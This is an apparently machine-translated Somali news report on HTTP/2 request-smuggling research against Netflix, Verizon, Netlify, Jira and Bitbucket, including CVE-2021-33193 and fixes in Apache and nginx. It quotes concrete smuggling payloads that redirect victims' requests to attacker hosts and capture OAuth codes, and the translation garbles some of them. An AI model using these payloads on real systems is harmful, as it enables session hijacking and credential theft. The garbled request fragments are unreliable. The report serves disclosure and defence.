Nidaamyada shabakadaha kuwaas oo dhamaadka hore aqbala isku xirka HTTP / 2 oo u gudbiya dhabarka dambe ee HTTP / 1.1 ayaa la soo bandhigay nooc cusub oo weerarka "Codsiga Tahriibinta HTTP", kaas oo u oggolaanaya, soo diraya codsiyo macmiil oo si gaar ah loo qaabeeyey, dhex gal waxa ku jira codsiyada isticmaalayaasha kale ee lagu farsameeyay isla socodka u dhexeeya hore iyo gadaal. Weerarka waxaa loo isticmaali karaa in lagu geliyo summada JavaScript-ka xaasidnimada leh fadhi leh degel sharci ah, ka gudubka nidaamyada xaddidaadda gelitaanka iyo ka-hortagga cabbirrada xaqiijinta.
Dhibaatadu waxay saamaysaa wakiillada shabakadda, dheelli-tireyaasha culeyska, dardar-geliyayaasha shabakadda, nidaamyada gudbinta nuxurka iyo qaabeynta kale kuwaas oo codsiyada lagu jiheeyo qaab hore-dhamaadka-ilaa-dhamaadka. Qoraaga daraasaddan ayaa muujiyay suurtagalnimada in lagu weeraro nidaamyada Netflix, Verizon, Bitbucket, Netlify CDN iyo Atlassian, waxaana la helay 56 kun oo doolar oo abaalmarin ah barnaamijyada lagu ogaanayo dayacanka. Dhibaatada sidoo kale waxaa lagu xaqiijiyay badeecadaha Shabakadaha F5. Dhibaatadu waxay qayb ahaan saamaysaa mod_proxy ee server-ka Apache http (CVE-2021-33193), hagaajin ayaa la filayaa nooca 2.4.49 (horumariyeyaasha waxaa la ogeysiiyay dhibaatada horraantii Maajo waxaana la siiyay 3 bilood si ay u hagaajiyaan). Gudaha nginx, awoodda isku mar lagu qeexo "Content-Length" iyo "Transfer-Encoding" madaxyada ayaa la xannibay siideynta ugu dambeysay (1.21.1). Aaladaha weerarku waxay hore ugu jireen xirmada Toolkit Burp waxaana lagu heli karaa qaab kordhinta Turbo Intruder.
Mabda'a hawlgalka habka cusub ee codsiyada isdhaafsiga ee taraafikada waxay la mid tahay baylahnimada uu aqoonsaday isla cilmi-baadhaha laba sano ka hor, laakiin ku xaddidan meelaha hore ee aqbalaya codsiyada HTTP/1.1. Aynu dib u xasuusanno in nidaamka dhabarka hore, codsiyada macmiilka ay helayaan nood dheeraad ah - hore, kaas oo dejinaya xidhiidh dheer oo TCP ah oo leh dhabarka, kaas oo si toos ah u socodsiiya codsiyada. Isku xirkan caadiga ah, codsiyada isticmaalayaasha kala duwan ayaa badanaa la kala qaadaa, kuwaas oo raacaya silsiladda midba midka kale, oo lagu kala soocayo habka HTTP.
Weerarkii caadiga ahaa ee "Codsiga Tahriibka HTTP" wuxuu ku salaysan yahay xaqiiqda ah in geesaha hore iyo gadaaluhu ay tarjumaan isticmaalka cinwaanada HTTP "Content-Length" (wuxuu go'aamiyaa cabbirka guud ee xogta codsiga) iyo "Transfer-encoding: chunked" (waxay ogolaataa). xogta lagu wareejinayo qaybo) si ka duwan. Tusaale ahaan, haddii dhinaca hore uu taageero oo keliya "Content-Length" balse uu iska indhatiro "Transfer-Encoding: chunked", markaas weeraryahanku wuxuu soo diri karaa codsi ka kooban labada "Content-Length" iyo "Transfer-Encoding: chunked" madaxyada, laakiin cabbirku waa "Content-Length" kuma dhigma xajmiga silsiladda la jarjaray. Xaaladdan oo kale, safka hore ayaa habayn doona oo dib u hagaajin doona codsiga si waafaqsan "Content-Length", dhabarka dambe wuxuu sugi doonaa dhamaystirka xannibaadda iyadoo lagu saleynayo "Transfer-Encoding: jeexan" iyo dabada soo hartay ee codsiga weerarka weerarka noqo bilowga codsiga qof kale la gudbiyo marka xigta.
Si ka duwan hab-maamuuska qoraalka HTTP/1.1, kaas oo lagu qiimeeyay heerka xariiqda, HTTP/2 waa hab-maamuuska binary oo wuxuu maamulaa blocks xogta cabbir hore loo cayimay. Si kastaba ha ahaatee, HTTP/2 waxay isticmaashaa madax been abuur ah oo u dhigma madaxyada HTTP caadiga ah. Marka laga hadlayo isdhexgalka dhabarka dambe iyada oo loo marayo nidaamka HTTP / 1.1, hore ayaa u tarjuma madaxyada been abuurka ah ee HTTP / 1.1 ee la midka ah. Dhibaatadu waxay tahay in dhabarka dambe uu gaaro go'aamo ku saabsan kala-soocidda qulqulka iyadoo lagu saleynayo madax-madaxeedyada HTTP ee ay dejiyeen dhinaca hore, iyada oo aan haysan macluumaad ku saabsan cabbirrada codsiga asalka ah.
Gaar ahaan, qiyamka "dhererka-dhererka" iyo "transfer-encoding" waxaa lagu kala qaadi karaa qaab madax been abuur ah, in kasta oo xaqiiqda ah in aan loo isticmaalin HTTP / 2, maadaama cabbirka xogta oo dhan la go'aamiyay. beer gooni ah. Si kastaba ha ahaatee, inta lagu guda jiro habka loo beddelo codsiga HTTP/2 HTTP/1.1, madaxyadan waa la qaadayaa waxayna jahawareerin karaan dhabarka. Waxaa jira laba nooc oo kala duwan oo weerar ah: H2.TE iyo H2.CL, kaas oo dhabarka dambe lagu marin habaabiyo wareejinta-kumbuyuutareedka khaldan ama qiimaha dhererka nuxurka oo aan u dhigmin cabbirka dhabta ah ee jirka codsiga uu ka helay dhinaca hore HTTP/2 borotokoolka.
Tusaalaha weerarka H2.CL waa in lagu qeexo cabbirka saxda ah ee dhererka-dhererka-madaxa been-abuurka ah marka loo dirayo codsi HTTP/2 Netflix. Codsigani wuxuu horseedayaa in lagu daro madax HTTP la mid ah Content-Length marka la gelayo dhabarka dambe ee HTTP/1.1, laakiin maadaama cabbirka Mawduuca-Length lagu cayimay mid ka yar kan dhabta ah, qayb ka mid ah xogta dabada ayaa loo habeeyey sida bilowga codsiga soo socda.
Tusaale ahaan, codso HTTP/2 :hab POST :path /n :authority www.netflix.com content-dherer 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
Waxay dhalin doontaa in codsi loo diro dhabarka dambe: POST /n HTTP/1.1 Martigeliyaha: www.netflix.com Content-Length: 4 abcdGET /n HTTP/1.1 Martigeliyaha: 02.rs?x.netflix.com Foo: bar
Maadaama dhererka-Content-ku leeyahay qiimaha 4, dhabarku wuxuu aqbali doonaa kaliya "abcd" oo ah jirka codsiga, inta soo hartayna "GET / n HTTP/1.1..." waxaa loo habayn doonaa bilowga codsiga xiga. la xidhiidha isticmaale kale. Sidaa awgeed, qulqulka ayaa noqon doona kala-saarid iyo ka jawaabista codsiga soo socda, natiijada ka-hortagga codsiga dummy-ga ayaa la soo saari doonaa. Marka laga hadlayo Netflix, qeexida martigeliyaha qolo saddexaad ee "Host": "madaxa madaxa codsi nabadeed waxay keentay in macmiilku soo celiyo jawaabta" Goobta: https://02.rs?x.netflix.com/n" iyo la oggolaaday in macluumaadka aan loo baahnayn loo diro macmiilka, oo ay ku jiraan Ku socodsii koodhka JavaScript ee macnaha guud ee goobta Netflix.
Doorashada labaad ee weerarka (H2.TE) waxay ku lug leedahay beddelka "Transfer-Encoding: chunked" madaxa. Isticmaalka wareejinta-ku-soo-qabashada madaxa been-abuurka ah ee HTTP/2 waa mamnuuc qeexida iyo codsiyada la xidhiidha waxa loo qoray in loola dhaqmo sidii khalad. Iyada oo ay taasi jirto, qaar ka mid ah fulinta horudhaca ah ayaan xisaabtan shuruuddan ku xisaabtamin oo ay oggolaadaan adeegsiga wareejin-ku-soo-qabashada madaxa been-abuurka ee HTTP/2, kaas oo loo beddelo madax HTTP la mid ah. Haddii uu jiro madaxa "Transfer-Encoding", dhabarku waxa uu u qaadan karaa mudnaan sare oo uu u kala qaybiyo xogta qayb qayb qaab "la jeexjeexay" iyadoo la isticmaalayo baloogyo cabbirro kala duwan leh qaabka "{size}\r\n{block }\r\n{size} \r\n{block}\r\n0", inkasta oo kala qaybsanaanta bilawga ah tahay guud ahaan cabbirka.
Joogitaanka farqiga noocan oo kale ah waxaa muujiyay tusaalaha Verizon. Dhibaatadu waxay khusaysay marinka xaqiijinta iyo nidaamka maaraynta macluumaadka, kaas oo sidoo kale lagu isticmaalo goobaha sida Huffington Post iyo Engadget. Tusaale ahaan, codsiga macmiilka ee HTTP/2:: Habka POST :path /identitfy/XUI :authority id.b2b.oath.com wareejinta-encoding chunked 0 GET /oops HTTP/1.1 Host: psres.net Content-Length: 10 x=
Natiijadu waxay tahay in loo diro codsi HTTP/1.1 gadaasha dambe: POST /identity/XUI HTTP/1.1 Martigeliyaha: id.b2b.oath.com Content-Length: 66 Transfer-Encoding: chunked 0 GET /oops HTTP/1.1 Host: psres. Waxyaabaha saafiga ah- Dhererka: 10x=
Dhabarka dambe, isna, wuu iska indho-tiray madaxa "Content-Length" oo wuxuu sameeyay qaybinta gudaha ee ku salaysan "Transfer-Encoding: chunked". Ficil ahaan, weerarku waxa uu suurtageliyay in codsiyada isticmaalaha loo jiheeyo shabakadooda, oo ay ku jirto codsiyada dhex galka ah ee la xidhiidha xaqiijinta OAuth, cabbiraadaha kuwaas oo lagu soo bandhigay madaxa tixraaca, iyo sidoo kale jilitaanka fadhiga aqoonsiga iyo kicinta nidaamka isticmaalaha si uu u soo diro aqoonsiga. ku socda ninkii weerarka soo qaaday. GET /b2blanding/show/oops HTTP/1.1 Martigeliyaha: psres.net Tixraaca: https://id.b2b.oath.com/?β¦&code=sirta GET / HTTP/1.1 Martigeliyaha: psres.net Oggolaanshaha: Side eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ikβ¦
Si loo weeraro fulinta HTTP/2 ee aan ogolayn wareejin-ku-soo-qabashada madaxa been-abuurka ah in la cayimo, hab kale ayaa la soo jeediyay kaas oo ku lug leh beddelka madaxa "Transfer-Encoding" iyadoo lagu dhejinayo madax kale oo been abuur ah oo uu kala soocay dabeecad cusub marka loo beddelo HTTP/1.1 kiiskan wuxuu abuuraa laba madax HTTP oo kala duwan).
Tusaale ahaan, Atlassian Jira iyo Netlify CDN (oo loo isticmaalay in loogu adeego bogga bilawga Mozilla ee Firefox) ayay saamaysay dhibaatadan. Gaar ahaan, codsiga HTTP/2: Habka POST :path / :authority start.mozilla.org foo b\r\n transfer-encoding: chunked 0\r\n \r\n GET / HTTP/1.1\r\n : evil-netlify-domain\r\n Content-Length: 5\r\n \r\nx=
waxay keentay in codsi HTTP/1.1 POST / HTTP/1.1 loo diro qaybta danbe \ r\n Host: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: jeexan\r\n Content-Length : 71\r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r \nx=
Ikhtiyaarka kale ee lagu beddelayo madaxa "Transfer-Encoding" waxay ahayd in lagu lifaaqo magaca madax been abuur ah ama xariiq leh hab codsi. Tusaale ahaan, marka la gelayo Atlassian Jira, magaca madaxa beenta ah "foo:bar\r\ntransfer-encoding" oo leh qiimihii "la jarjaray" wuxuu sababay madaxyada HTTP "foo:bar" iyo "transfer-encoding: chunked" in lagu daro. , iyo qeexida madaxa beenta ah ":habka" qiimaha "GET / HTTP/1.1\r\nTransfer-encoding: chunked" waxaa loo tarjumay "GET / HTTP/1.1 \ r\ntransfer-encoding: chunked".
Cilmi-baaraha oo aqoonsaday dhibaatada ayaa sidoo kale soo jeediyay farsamada tunnel-ka codsiga si loo weeraro safka hore, kaas oo ciwaanka IP kasta uu dejiyo xiriir gaar ah dhabarka iyo taraafikada isticmaalayaasha kala duwan aan isku dhafanayn. Farsamada la soo jeediyay ma ogola faragelinta codsiyada isticmaalayaasha kale, laakiin waxay suurtogal ka dhigaysaa in la sumeeyo kayd la wadaago oo saameeya habaynta codsiyada kale, waxayna ogolaataa beddelka madaxyada HTTP gudaha ee loo isticmaalo in lagu wareejiyo macluumaadka adeegga laga soo bilaabo dhinaca hore ilaa dhabarka ( tusaale ahaan, marka la xaqiijinayo dhinaca hore ee madaxyada noocan oo kale ah waxay u gudbin karaan macluumaadka ku saabsan isticmaalaha hadda xagga dambe). Tusaale ahaan habka loo adeegsado ficil ahaan, iyadoo la adeegsanayo sumowga kaydka, waxaa suurtagal ahayd in la xakameeyo boggaga adeegga Bitbucket.
Source: opennet.ru